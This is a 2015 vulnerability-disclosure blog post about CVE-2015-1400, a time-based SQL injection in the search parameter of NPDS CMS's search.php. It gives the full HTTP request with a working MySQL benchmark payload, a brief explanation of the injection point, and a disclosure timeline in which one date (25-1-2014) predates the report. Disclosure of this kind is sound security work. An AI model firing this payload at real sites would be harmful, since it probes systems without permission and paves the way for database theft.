Monday 26 January 2015

NPDS CMS SQL Injection - CVE-2015-1400

Hello folks ! its a long time left i did not write any finding from 2 months , So today i will share one of my finding about NPDS CMS Time Based SQL Injection

What Is NPDS CMS - Beyond content management 'classic', NPDS implements a set of functions specifically dedicated to the management of community and collaborative working groups.
This is a C ontent & C ommunity M anagement S ystem ( CCMS) robust, secure, complete, efficient and really speaking French. Manage your community of users, your collaborative work groups, publish, manage and organize your content with powerful tools available basis.

You can find more about NPDS CMS from this link

So lets come to the finding !

The vulnerability is straight forward and simple as you can know about SQL Injection , While testing this CMS i have found that "search" Post Parameter is vulnerable To Time Based SQL Injection , I think it is vulnerable to other injection as well , but personally i like Time Based SQL Injection so i test it for the same

Here is the HTTP Request Which I Found To Be Vulnerable 

POST /npds/search.php HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: admin=; pun_cookie_b03d0f=1%7C5c85108006f3ca4b272432a5be442deb43756d9c%7C1447517668%7C7 5fabcf00a72c6c06c40ec432c44c158a90fe85b; Elgg_install=0vsakk8pm4ksu1je3fp48krjv0; Elgg=8ojmn31jmhn2sntglokbokm0t1
Connection: keep-alive
!content-type:! application/x-www-form-urlencoded
Content-Length: 63

query=")and benchmark(20000000,sha1(1))--


I performed the Benchmar Test For This Which Was -"and benchmark(20000000,sha1(1))--

The benchmark is best way to test for Time Based SQL Injection -

This forced server to waits for about a second before response, which make me confirm that there is SQL Injection Possibility

We Analyze it briefly

Back End SQL Query

SELECT * FROM some_table WHERE example = [Injection point]

Our Payload

SELECT * FROM some_table WHERE example =")and benchmark(20000000,sha1(1))--

This cause SQL Server to wait for some seconds before sending the response

This was the simple finding as you know =D !


Reporting Time Line **

Reported To Vendor  - 14-12-2014

Verified By Vendor -  15-12-2014

Acknowledge By Vendor - 25-1-2015

Public Disclosure By Vendor - 25-1-2014

Technical Disclosure  - 25-1-2015

CVE ID -  CVE-2015-1400

 Mitigation For This Vulnerability - There Is No Update By Vendor , But That Will Be Out Soon !

So This Was All About - NPDS CMS SQL Injection

Thanks For Reading ! Comments Are Always Welcome :)

No comments:

Post a Comment